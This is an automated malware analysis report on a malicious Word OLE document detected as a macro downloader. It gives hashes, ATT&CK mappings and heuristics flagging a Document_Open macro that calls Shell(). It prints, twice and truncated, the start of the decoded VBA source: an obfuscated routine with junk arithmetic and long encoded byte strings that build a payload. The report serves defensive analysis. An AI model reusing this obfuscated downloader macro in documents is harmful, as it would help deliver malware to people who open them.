Office (OLE) malware analysis — malicious · 08f9017c9e8d575c

MALICIOUS

Office (OLE)

269.5 KB Created: 2015-12-04 17:19:00 Authoring application: Microsoft Office Word First seen: 2017-11-29

MD5: 4b2c4f7ceaf4298dc807cc8fb8f85021 SHA-1: f346717a5a209ed861e666fdb2cbe38d5b0815d1 SHA-256: 08f9017c9e8d575c3758a928ce62d176888ff02bca48ebeeeabaa5be4ead29c3

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.Adnel-6923089-0' further supports this downloader functionality.

Heuristics 6

ClamAV: Doc.Downloader.Adnel-6923089-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Adnel-6923089-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29679 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	29679 bytes
SHA-256: `9017b7e1e3bd89ff38395a926abf83478203bc9f65f3c105947b344c27dec2f5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function Ejk5Vu0S Lib "TQCHzOGKIXucUU" Alias "Pw77c2kcB5XvrU" (ByVal TR2yFgtjh3 As String, UoduxdsIhnQ As Long) As Long #Else Private Declare Function Ejk5Vu0S lib "TQCHzOGKIXucUU" Alias "Pw77c2kcB5XvrU"(byval TR2yFgtjh3 as String, UoduxdsIhnQ as Long ) as Long #End If Sub IMH0m14q9wRdN() K6mZEr2Tg78 = 56 If K6mZEr2Tg78 + IAdg > 1 Then IAdg = 57 + 9 + 26 + 50 '4 C3PJsraGpX 41 2 End If IAdg = 48 + 82 '32 82 5 C9Rxv Dim WVPvuoDbPS As String, QxCMP99() As String, LWHmN1h7CQmG As Integer F6sYXkHkBl4rZd = 3 If F6sYXkHkBl4rZd + Rwuw0WCmu9 > 1 Then Rwuw0WCmu9 = 17 + 75 + 27 + 98 '30 ONipAFntkT 37 42 End If Rwuw0WCmu9 = 26 + 74 '30 89 58 SQDEDZrtx WVPvuoDbPS = WVPvuoDbPS & "242,170,218,224,216,215,33,22,102,103,68,22,26,64,75,21,68,53,112,0,3,123,29,76,5,27,60,66,65,0,110,25,41,93,121,119,31,117,102,28,88,55,44,85,32,48,98,61,67,122,119,114,99,10,6,38,92,104,116,96,7,112,115,116,53,120,109,82,80,59,70,77,117,8,15,97,27,115,91,92,49,75,79,20,99,24,126,14,25,120,96,89,116,53,68,8,7,73,64,34,124,23,4,116,109,56,105,121,97,57,125,73,44,119,4,110,21,7,82,61,116,36,41,125,32,124,119,60,142,236,142,157,241,184,219,148,206,138,188,142,163,205,165,159,229,222,175,195,211,138,185,240,237,129,201,137,240,199,204,199,160,200,212,165,223,189,130,223,133,157,255,244,242,144,189,213,131,198,137,227,193,229,243,238,179,201,168,178,135,242,131,249,161,194,223,239,213,168,164,198,171,209,134,191,246,210,139,236,171,249,201,210,163,130,213,180,198,198,240,231" X7rZR = 17 If X7rZR + NK7Q75JnVO > 1 Then NK7Q75JnVO = 28 + 43 + 23 + 83 '2 OiY46JvlHc1FHL10z 3 98 End If NK7Q75JnVO = 9 + 53 '66 80 39 YhgDd6dg WVPvuoDbPS = WVPvuoDbPS & ",143,173,161,206,144,249,216,190,145,208,186,248,150,212,254,238,143,245,162,141,157,230,224,201,177,145,218,190,252,225,61,42,68,100,93,78,98,37,116,92,61,120,72,30,125,85,77,66,31,19,41,70,37,11,92,3,8,30,83,46,17,51,47,121,41,17,196,224,203,234,212,182,111,110,60,119,38,101,86,31,15,10,16,22,1,99,116,116,28,29,56,29,123,57,16,71,121,22,8,104,67,51,126,62,81,106,111,9,109,44,24,46,28,94,48,78,23,6,96,42,95,53,53,42,91,33,6,100,7,42,21,99,5,116,36,84,37,58,74,8,122,4,9,6,50,108,117,34,124,19,26,69,53,8,31,28,75,58,40,64,63,69,61,98,21,44,33,46,18,89,78,120,98,53,32,127,25,71,123,124,99,112,67,38,21,111,52,6,31,102,104,108,124,70,146,196,166,137,175,240,241,202,207,179,206,185,238,237,132,217,156,201,149,183,136,158,247,170,242,248,233,231,145,159,173,190,129,225,177,211" LeQwmu9 = 78 If LeQwmu9 + TROSWG > 1 Then TROSWG = 45 + 44 + 20 + 93 '46 YpAQHWA1f34y8vt 88 13 End If TROSWG = 40 + 5 '38 11 19 H7ePh3Wv3fI WVPvuoDbPS = WVPvuoDbPS & ",196,208,142,242,230,210,172,245,130,241,168,147,145,184,146,239,173,226,139,248,253,242,216,142,138,172,182,212,157,184,162,153,205,207,207,246,238,143,238,155,130,194,187,225,199,221,130,247,243,171,245,133,211,136,251,158,247,209,220,252,216,145,246,243,168,224,133,187,186,183,237,139,239,236,150,227,216,245,151,175,160,172,246,149,255,249,24,49,24,33,59,29,71,49,4,0,127,122,12,94,85,94,44,45,31,30,124,125,123,9,113,11,88,110,16,73,54,69,28,39,61,20,223,90,30,95,52,73,33,21,89,48,111,1,114,99,46,21,11,78,69,29,75,114,56,73,43,67,25,60,0,22,22,8,52,75,69,40,74,50,103,87,43,112,1,108,55,14,18,61,21,106,46,111,4,121,41,7,69,26,24,81,80,72,105,21,32,77,110,101,90,58,43,52,95,69,106,87,51,83,85,5,5,98,98,12,112,76,70,47,126,118,110,102,22,123,77,16,4,11,79,52,4,111,34,37,1" PMjzXgm7ca5rRt3RR = 4 If PMjzXgm7ca5rRt3RR + IKDPR9T > 1 Then IKDPR9T = 14 + 84 + 97 + 12 '44 OchPrVWlDc3F 95 93 End If IKDPR9T = 25 + 6 '11 94 43 RaJzH58qb WVPvuoDbPS = WVPvuoDbPS & "16,15,13,106,16,121,61,109,0,42,50,60,104,25,16,111,28,100,88,225,231,164,211,218,216,181,253,216,172,197,128,214,246,128,134,182,211,135,243,133,246,254,178,152,130,193,202,186,197 ... (truncated)

SHA-256: 9017b7e1e3bd89ff38395a926abf83478203bc9f65f3c105947b344c27dec2f5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function Ejk5Vu0S Lib "TQCHzOGKIXucUU" Alias "Pw77c2kcB5XvrU" (ByVal TR2yFgtjh3 As String, UoduxdsIhnQ As Long) As Long
#Else
Private Declare Function Ejk5Vu0S lib "TQCHzOGKIXucUU" Alias "Pw77c2kcB5XvrU"(byval TR2yFgtjh3 as String, UoduxdsIhnQ as Long ) as Long
#End If
Sub IMH0m14q9wRdN()
K6mZEr2Tg78 = 56
If K6mZEr2Tg78 + IAdg > 1 Then
IAdg = 57 + 9 + 26 + 50
'4 C3PJsraGpX 41 2
End If
IAdg = 48 + 82
'32 82 5 C9Rxv
Dim WVPvuoDbPS As String, QxCMP99() As String, LWHmN1h7CQmG As Integer
F6sYXkHkBl4rZd = 3
If F6sYXkHkBl4rZd + Rwuw0WCmu9 > 1 Then
Rwuw0WCmu9 = 17 + 75 + 27 + 98
'30 ONipAFntkT 37 42
End If
Rwuw0WCmu9 = 26 + 74
'30 89 58 SQDEDZrtx
WVPvuoDbPS = WVPvuoDbPS & "242,170,218,224,216,215,33,22,102,103,68,22,26,64,75,21,68,53,112,0,3,123,29,76,5,27,60,66,65,0,110,25,41,93,121,119,31,117,102,28,88,55,44,85,32,48,98,61,67,122,119,114,99,10,6,38,92,104,116,96,7,112,115,116,53,120,109,82,80,59,70,77,117,8,15,97,27,115,91,92,49,75,79,20,99,24,126,14,25,120,96,89,116,53,68,8,7,73,64,34,124,23,4,116,109,56,105,121,97,57,125,73,44,119,4,110,21,7,82,61,116,36,41,125,32,124,119,60,142,236,142,157,241,184,219,148,206,138,188,142,163,205,165,159,229,222,175,195,211,138,185,240,237,129,201,137,240,199,204,199,160,200,212,165,223,189,130,223,133,157,255,244,242,144,189,213,131,198,137,227,193,229,243,238,179,201,168,178,135,242,131,249,161,194,223,239,213,168,164,198,171,209,134,191,246,210,139,236,171,249,201,210,163,130,213,180,198,198,240,231"
X7rZR = 17
If X7rZR + NK7Q75JnVO > 1 Then
NK7Q75JnVO = 28 + 43 + 23 + 83
'2 OiY46JvlHc1FHL10z 3 98
End If
NK7Q75JnVO = 9 + 53
'66 80 39 YhgDd6dg
WVPvuoDbPS = WVPvuoDbPS & ",143,173,161,206,144,249,216,190,145,208,186,248,150,212,254,238,143,245,162,141,157,230,224,201,177,145,218,190,252,225,61,42,68,100,93,78,98,37,116,92,61,120,72,30,125,85,77,66,31,19,41,70,37,11,92,3,8,30,83,46,17,51,47,121,41,17,196,224,203,234,212,182,111,110,60,119,38,101,86,31,15,10,16,22,1,99,116,116,28,29,56,29,123,57,16,71,121,22,8,104,67,51,126,62,81,106,111,9,109,44,24,46,28,94,48,78,23,6,96,42,95,53,53,42,91,33,6,100,7,42,21,99,5,116,36,84,37,58,74,8,122,4,9,6,50,108,117,34,124,19,26,69,53,8,31,28,75,58,40,64,63,69,61,98,21,44,33,46,18,89,78,120,98,53,32,127,25,71,123,124,99,112,67,38,21,111,52,6,31,102,104,108,124,70,146,196,166,137,175,240,241,202,207,179,206,185,238,237,132,217,156,201,149,183,136,158,247,170,242,248,233,231,145,159,173,190,129,225,177,211"
LeQwmu9 = 78
If LeQwmu9 + TROSWG > 1 Then
TROSWG = 45 + 44 + 20 + 93
'46 YpAQHWA1f34y8vt 88 13
End If
TROSWG = 40 + 5
'38 11 19 H7ePh3Wv3fI
WVPvuoDbPS = WVPvuoDbPS & ",196,208,142,242,230,210,172,245,130,241,168,147,145,184,146,239,173,226,139,248,253,242,216,142,138,172,182,212,157,184,162,153,205,207,207,246,238,143,238,155,130,194,187,225,199,221,130,247,243,171,245,133,211,136,251,158,247,209,220,252,216,145,246,243,168,224,133,187,186,183,237,139,239,236,150,227,216,245,151,175,160,172,246,149,255,249,24,49,24,33,59,29,71,49,4,0,127,122,12,94,85,94,44,45,31,30,124,125,123,9,113,11,88,110,16,73,54,69,28,39,61,20,223,90,30,95,52,73,33,21,89,48,111,1,114,99,46,21,11,78,69,29,75,114,56,73,43,67,25,60,0,22,22,8,52,75,69,40,74,50,103,87,43,112,1,108,55,14,18,61,21,106,46,111,4,121,41,7,69,26,24,81,80,72,105,21,32,77,110,101,90,58,43,52,95,69,106,87,51,83,85,5,5,98,98,12,112,76,70,47,126,118,110,102,22,123,77,16,4,11,79,52,4,111,34,37,1"
PMjzXgm7ca5rRt3RR = 4
If PMjzXgm7ca5rRt3RR + IKDPR9T > 1 Then
IKDPR9T = 14 + 84 + 97 + 12
'44 OchPrVWlDc3F 95 93
End If
IKDPR9T = 25 + 6
'11 94 43 RaJzH58qb
WVPvuoDbPS = WVPvuoDbPS & "16,15,13,106,16,121,61,109,0,42,50,60,104,25,16,111,28,100,88,225,231,164,211,218,216,181,253,216,172,197,128,214,246,128,134,182,211,135,243,133,246,254,178,152,130,193,202,186,197
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.